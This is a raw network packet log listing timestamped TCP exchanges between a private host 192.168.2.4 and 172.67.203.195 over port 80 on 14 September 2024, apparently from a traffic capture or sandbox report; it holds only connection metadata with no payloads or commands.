Sep 14, 2024 18:31:09.077387094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077395916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077405930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077416897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077418089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077429056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077442884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077474117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077491045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077496052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077507019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077518940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077527046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077553034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077584028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077589989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077600002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077609062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077620029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077629089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077637911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077646971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077647924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077673912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077702045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078212976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078222036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078231096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078289032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078298092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078306913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078315020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078325033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078334093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078357935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078387976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078432083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078442097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078452110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078459978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078469992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078480005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078495979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078497887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078509092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078519106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078524113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078530073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078548908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078577995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078577995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078645945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078656912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078668118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078679085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078687906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078710079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078743935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078779936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078792095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078800917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078811884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078820944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.078840017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.078871012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.079524994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079535961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079545975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079607010 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.079636097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.079647064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079658031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079668045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079678059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079689026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079710007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.079772949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079782009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079787016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079792023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079801083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079811096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079821110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.079826117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.079857111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.079888105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.118542910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118577957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118588924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118593931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118603945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118616104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118628979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118638039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.118791103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.118792057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.161417961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161427975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161492109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161501884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161511898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161521912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161564112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161575079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.161722898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.161803961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.162178993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162189007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162199020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162265062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.162272930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162283897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162292957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162303925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162312984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.162408113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.162441969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163069963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163088083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163099051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163165092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163173914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163178921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163222075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163229942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163240910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163333893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163476944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163520098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163527966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163547039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163573027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163582087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163592100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163613081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163624048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163634062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163642883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163650036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163696051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163721085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163731098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163739920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163779974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163788080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163800955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163836956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163846970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163887024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.163924932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163934946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163944960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163960934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.163985968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164014101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164020061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164030075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164083004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164119959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164129972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164139986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164150953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164160967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164170980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164177895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164180040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164205074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164237022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164237976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164257050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164273977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164314985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164391041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164406061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164417028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164426088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164437056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164448023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164448023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164457083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164505959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164505959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164537907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164547920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164556980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164566994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.164597988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164630890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.164634943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165182114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165190935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165200949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165258884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165263891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165286064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165354967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165386915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165396929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165409088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165440083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165466070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165476084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165484905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165493965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165525913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165559053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165580988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165591955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165601015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165610075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165621042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165633917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165668011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165771008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165781021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165791035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165800095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165810108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165818930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165827990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165838003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165838957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165849924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165879011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165911913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.165921926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165931940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.165976048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.166009903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166021109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166086912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.166554928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166564941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166574001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166610956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166675091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166685104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166695118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166707039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.166739941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.166760921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166791916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166800976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166810036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166814089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.166845083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166847944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.166856050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166867971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166876078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.166913033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.205632925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205653906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205666065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205676079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205693960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205704927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205719948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.205743074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.205874920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.248402119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248426914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248435974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248483896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248495102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248506069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248517036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248554945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.248584032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.248624086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.249140978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249160051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249167919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249233961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249243975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249254942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249264956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249294043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.249330044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.249363899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.250193119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250207901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250220060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250230074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250241041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250279903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.250319958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250332117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250382900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.250415087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.250801086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250809908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250948906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.250961065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250972033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.250981092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251013041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251043081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251065969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251077890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251089096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251099110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251122952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251146078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251154900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251171112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251183033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251193047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251216888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251256943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251271009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251291990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251323938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251332045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251343966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251353979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251365900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251377106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251408100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251408100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251483917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251502037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251518011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251529932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251540899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251576900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251600981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251602888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251612902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251624107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251673937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251683950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251693964 CEST	80	49738	172.67.203.195	192.168.2.4
